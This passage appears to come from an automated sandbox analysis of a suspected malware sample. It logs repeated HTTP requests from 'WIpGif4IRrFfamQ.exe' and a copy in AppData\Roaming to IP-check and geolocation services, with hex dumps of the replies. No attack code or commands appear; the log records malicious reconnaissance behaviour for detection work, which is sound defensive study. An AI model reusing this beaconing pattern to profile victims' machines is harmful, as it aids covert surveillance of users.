                                                                              Host: checkip.dyndns.org
                                                                              Connection: Keep-Alive
                                                                              Oct 1, 2024 10:55:00.042814970 CEST320INHTTP/1.1 200 OK
                                                                              Date: Tue, 01 Oct 2024 08:54:59 GMT
                                                                              Content-Type: text/html
                                                                              Content-Length: 103
                                                                              Connection: keep-alive
                                                                              Cache-Control: no-cache
                                                                              Pragma: no-cache
                                                                              X-Request-ID: 5a8d60149d6ccc2b9f862a3ecd0f558d
                                                                              Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                              Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>
                                                                              Oct 1, 2024 10:55:00.069933891 CEST127OUTGET / HTTP/1.1
                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                              Host: checkip.dyndns.org
                                                                              Oct 1, 2024 10:55:00.255995035 CEST320INHTTP/1.1 200 OK
                                                                              Date: Tue, 01 Oct 2024 08:55:00 GMT
                                                                              Content-Type: text/html
                                                                              Content-Length: 103
                                                                              Connection: keep-alive
                                                                              Cache-Control: no-cache
                                                                              Pragma: no-cache
                                                                              X-Request-ID: 7b27adea8048424020009ce25da822b7
                                                                              Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                              Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>
                                                                              Oct 1, 2024 10:55:02.033912897 CEST127OUTGET / HTTP/1.1
                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                              Host: checkip.dyndns.org
                                                                              Oct 1, 2024 10:55:04.006131887 CEST320INHTTP/1.1 200 OK
                                                                              Date: Tue, 01 Oct 2024 08:55:03 GMT
                                                                              Content-Type: text/html
                                                                              Content-Length: 103
                                                                              Connection: keep-alive
                                                                              Cache-Control: no-cache
                                                                              Pragma: no-cache
                                                                              X-Request-ID: 95d02c545963126052dc6d0df0b87b6b
                                                                              Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                              Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              1192.168.2.549712193.122.6.168807708C:\Users\user\AppData\Roaming\AcEnrS.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              Oct 1, 2024 10:55:04.653181076 CEST151OUTGET / HTTP/1.1
                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                              Host: checkip.dyndns.org
                                                                              Connection: Keep-Alive
                                                                              Oct 1, 2024 10:55:19.270039082 CEST745INHTTP/1.1 504 Gateway Time-out
                                                                              Date: Tue, 01 Oct 2024 08:55:19 GMT
                                                                              Content-Type: text/html
                                                                              Content-Length: 557
                                                                              Connection: keep-alive
                                                                              X-Request-ID: d771a6eed583317c1cae219d2e130466
                                                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 35 30 34 20 47 61 74 65 77 61 79 20 54 69 6d 65 2d 6f 75 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 35 30 34 20 47 61 74 65 77 61 79 20 54 69 6d 65 2d 6f 75 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c [TRUNCATED]
                                                                              Data Ascii: <html><head><title>504 Gateway Time-out</title></head><body><center><h1>504 Gateway Time-out</h1></center><hr><center></center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              2192.168.2.549713193.122.6.168807308C:\Users\user\Desktop\WIpGif4IRrFfamQ.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              Oct 1, 2024 10:55:04.741929054 CEST127OUTGET / HTTP/1.1
                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                              Host: checkip.dyndns.org
                                                                              Oct 1, 2024 10:55:16.176819086 CEST320INHTTP/1.1 200 OK
                                                                              Date: Tue, 01 Oct 2024 08:55:16 GMT
                                                                              Content-Type: text/html
                                                                              Content-Length: 103
                                                                              Connection: keep-alive
                                                                              Cache-Control: no-cache
                                                                              Pragma: no-cache
                                                                              X-Request-ID: 0173b54866a709cc07350df5331e5d54
                                                                              Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                              Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              3192.168.2.549722193.122.6.168807308C:\Users\user\Desktop\WIpGif4IRrFfamQ.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              Oct 1, 2024 10:55:16.797909021 CEST127OUTGET / HTTP/1.1
                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                              Host: checkip.dyndns.org
                                                                              Oct 1, 2024 10:55:24.710340023 CEST745INHTTP/1.1 504 Gateway Time-out
                                                                              Date: Tue, 01 Oct 2024 08:55:24 GMT
                                                                              Content-Type: text/html
                                                                              Content-Length: 557
                                                                              Connection: keep-alive
                                                                              X-Request-ID: e62c1152ac7852e39a1f19dfb6bd4b31
                                                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 35 30 34 20 47 61 74 65 77 61 79 20 54 69 6d 65 2d 6f 75 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 35 30 34 20 47 61 74 65 77 61 79 20 54 69 6d 65 2d 6f 75 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c [TRUNCATED]
                                                                              Data Ascii: <html><head><title>504 Gateway Time-out</title></head><body><center><h1>504 Gateway Time-out</h1></center><hr><center></center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              4192.168.2.549726193.122.6.168807308C:\Users\user\Desktop\WIpGif4IRrFfamQ.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              Oct 1, 2024 10:55:24.724757910 CEST151OUTGET / HTTP/1.1
                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                              Host: checkip.dyndns.org
                                                                              Connection: Keep-Alive
                                                                              Oct 1, 2024 10:55:28.482067108 CEST320INHTTP/1.1 200 OK
                                                                              Date: Tue, 01 Oct 2024 08:55:28 GMT
                                                                              Content-Type: text/html
                                                                              Content-Length: 103
                                                                              Connection: keep-alive
                                                                              Cache-Control: no-cache
                                                                              Pragma: no-cache
                                                                              X-Request-ID: 84acc2bca924dddef30508e384f187bf
                                                                              Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                              Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              5192.168.2.549730193.122.6.168807308C:\Users\user\Desktop\WIpGif4IRrFfamQ.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              Oct 1, 2024 10:55:29.102566004 CEST151OUTGET / HTTP/1.1
                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                              Host: checkip.dyndns.org
                                                                              Connection: Keep-Alive
                                                                              Oct 1, 2024 10:55:31.730093002 CEST320INHTTP/1.1 200 OK
                                                                              Date: Tue, 01 Oct 2024 08:55:31 GMT
                                                                              Content-Type: text/html
                                                                              Content-Length: 103
                                                                              Connection: keep-alive
                                                                              Cache-Control: no-cache
                                                                              Pragma: no-cache
                                                                              X-Request-ID: 2285d6b6ab9c1fd7caad0766399d0c58
                                                                              Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                              Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              6192.168.2.549735193.122.6.168807308C:\Users\user\Desktop\WIpGif4IRrFfamQ.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              Oct 1, 2024 10:55:32.409847975 CEST151OUTGET / HTTP/1.1
                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                              Host: checkip.dyndns.org
                                                                              Connection: Keep-Alive
                                                                              Oct 1, 2024 10:55:33.043318987 CEST320INHTTP/1.1 200 OK
                                                                              Date: Tue, 01 Oct 2024 08:55:32 GMT
                                                                              Content-Type: text/html
                                                                              Content-Length: 103
                                                                              Connection: keep-alive
                                                                              Cache-Control: no-cache
                                                                              Pragma: no-cache
                                                                              X-Request-ID: eedd2e58a59fbc8f1c6c5eb76f496b84
                                                                              Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                              Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              7192.168.2.549738193.122.6.168807308C:\Users\user\Desktop\WIpGif4IRrFfamQ.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              Oct 1, 2024 10:55:33.658849001 CEST151OUTGET / HTTP/1.1
                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                              Host: checkip.dyndns.org
                                                                              Connection: Keep-Alive
                                                                              Oct 1, 2024 10:55:34.303560972 CEST320INHTTP/1.1 200 OK
                                                                              Date: Tue, 01 Oct 2024 08:55:34 GMT
                                                                              Content-Type: text/html
                                                                              Content-Length: 103
                                                                              Connection: keep-alive
                                                                              Cache-Control: no-cache
                                                                              Pragma: no-cache
                                                                              X-Request-ID: c29a497e8542ecbbbc111c4d39b3a77b
                                                                              Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                              Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              8192.168.2.549742193.122.6.168807308C:\Users\user\Desktop\WIpGif4IRrFfamQ.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              Oct 1, 2024 10:55:35.178710938 CEST151OUTGET / HTTP/1.1
                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                              Host: checkip.dyndns.org
                                                                              Connection: Keep-Alive
                                                                              Oct 1, 2024 10:55:35.806416035 CEST320INHTTP/1.1 200 OK
                                                                              Date: Tue, 01 Oct 2024 08:55:35 GMT
                                                                              Content-Type: text/html
                                                                              Content-Length: 103
                                                                              Connection: keep-alive
                                                                              Cache-Control: no-cache
                                                                              Pragma: no-cache
                                                                              X-Request-ID: 4b747f33e174d61c1a924f1f74e73aa7
                                                                              Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                              Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              0192.168.2.549708188.114.97.34437308C:\Users\user\Desktop\WIpGif4IRrFfamQ.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              2024-10-01 08:55:01 UTC84OUTGET /xml/8.46.123.33 HTTP/1.1
                                                                              Host: reallyfreegeoip.org
                                                                              Connection: Keep-Alive
                                                                              2024-10-01 08:55:01 UTC666INHTTP/1.1 200 OK
                                                                              Date: Tue, 01 Oct 2024 08:55:01 GMT
                                                                              Content-Type: application/xml
                                                                              Transfer-Encoding: chunked
                                                                              Connection: close
                                                                              access-control-allow-origin: *
                                                                              vary: Accept-Encoding
                                                                              Cache-Control: max-age=86400
                                                                              CF-Cache-Status: EXPIRED
                                                                              Last-Modified: Tue, 01 Oct 2024 08:55:01 GMT
                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=NnQoqUBdXA773punbhnYTLyyoPijVqkusFZWyNdM2%2BqpBbXvOmiPicCCG7sfKpLKj0ZMHqIgZNs0x4mX8RtIeboSLdmO3LYroGonR%2BT5tDxanOzXrawjlSeV2HDuAcl8agG2gyJD"}],"group":"cf-nel","max_age":604800}
                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                              Server: cloudflare
                                                                              CF-RAY: 8cbb3b3a5e07de93-EWR
                                                                              2024-10-01 08:55:01 UTC340INData Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35
                                                                              Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
                                                                              2024-10-01 08:55:01 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                              Data Ascii: 0


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              1192.168.2.549711188.114.97.34437308C:\Users\user\Desktop\WIpGif4IRrFfamQ.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              2024-10-01 08:55:04 UTC60OUTGET /xml/8.46.123.33 HTTP/1.1
                                                                              Host: reallyfreegeoip.org
                                                                              2024-10-01 08:55:04 UTC678INHTTP/1.1 200 OK
                                                                              Date: Tue, 01 Oct 2024 08:55:04 GMT
                                                                              Content-Type: application/xml
                                                                              Transfer-Encoding: chunked
                                                                              Connection: close
                                                                              access-control-allow-origin: *
                                                                              vary: Accept-Encoding
                                                                              Cache-Control: max-age=86400
                                                                              CF-Cache-Status: HIT
                                                                              Age: 3
                                                                              Last-Modified: Tue, 01 Oct 2024 08:55:01 GMT
                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=7k9upb3SlbWOgB5R9jN%2BJAx34KE0bxHc9RrwVhH%2FX%2F6t7YKklYJEKyANDC4ddE8muyMYiSjcNV2y%2BZmc2GdenZ8q6aw0%2FQgr%2FlOus0wgO5fS3yFtjm0Jls6tigxVNbA5NbAWZIuk"}],"group":"cf-nel","max_age":604800}
                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                              Server: cloudflare
                                                                              CF-RAY: 8cbb3b4e2df4c434-EWR
                                                                              2024-10-01 08:55:04 UTC340INData Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35
                                                                              Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
                                                                              2024-10-01 08:55:04 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                              Data Ascii: 0


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              2192.168.2.549721188.114.97.34437308C:\Users\user\Desktop\WIpGif4IRrFfamQ.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              2024-10-01 08:55:16 UTC84OUTGET /xml/8.46.123.33 HTTP/1.1
                                                                              Host: reallyfreegeoip.org
                                                                              Connection: Keep-Alive
                                                                              2024-10-01 08:55:16 UTC673INHTTP/1.1 200 OK
                                                                              Date: Tue, 01 Oct 2024 08:55:16 GMT
                                                                              Content-Type: application/xml
                                                                              Transfer-Encoding: chunked
                                                                              Connection: close
                                                                              access-control-allow-origin: *
                                                                              vary: Accept-Encoding
                                                                              Cache-Control: max-age=86400
                                                                              CF-Cache-Status: HIT
                                                                              Age: 15
                                                                              Last-Modified: Tue, 01 Oct 2024 08:55:01 GMT
                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=1jOteGyE9YVx%2BkgfreCt2fRdd4joL%2BsRMPmInu5N4ZcLWwK8yHAV3eQ2mUbrzJrWmJMbqzLbD7ZnbU7eQVoSoSgpeIsWUaIpHnCznz%2Bi4Mu91bGYDyskDbwUo6RgsrGqTcDeWoL6"}],"group":"cf-nel","max_age":604800}
                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                              Server: cloudflare
                                                                              CF-RAY: 8cbb3b99880e4402-EWR
                                                                              2024-10-01 08:55:16 UTC340INData Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35
                                                                              Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
                                                                              2024-10-01 08:55:16 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                              Data Ascii: 0


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              3192.168.2.549728188.114.97.34437308C:\Users\user\Desktop\WIpGif4IRrFfamQ.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              2024-10-01 08:55:28 UTC84OUTGET /xml/8.46.123.33 HTTP/1.1
                                                                              Host: reallyfreegeoip.org
                                                                              Connection: Keep-Alive
                                                                              2024-10-01 08:55:29 UTC673INHTTP/1.1 200 OK
                                                                              Date: Tue, 01 Oct 2024 08:55:29 GMT
                                                                              Content-Type: application/xml
                                                                              Transfer-Encoding: chunked
                                                                              Connection: close
                                                                              access-control-allow-origin: *
                                                                              vary: Accept-Encoding
                                                                              Cache-Control: max-age=86400
                                                                              CF-Cache-Status: HIT
                                                                              Age: 28
                                                                              Last-Modified: Tue, 01 Oct 2024 08:55:01 GMT
                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=j14Xerq2zaJpHpTbA2j3EglTD5Ce%2FR6ORSQxsfv5cyUMi5yCsvMVQLxeVidxWtdgvTQ4m7tcmkEAPVVrC3qO8Aqdfylep139gNLM11EWWVqDzHpZxUTkz7O8vz2%2F0y7cE%2B92HXo7"}],"group":"cf-nel","max_age":604800}
                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                              Server: cloudflare
                                                                              CF-RAY: 8cbb3be66e6942fd-EWR
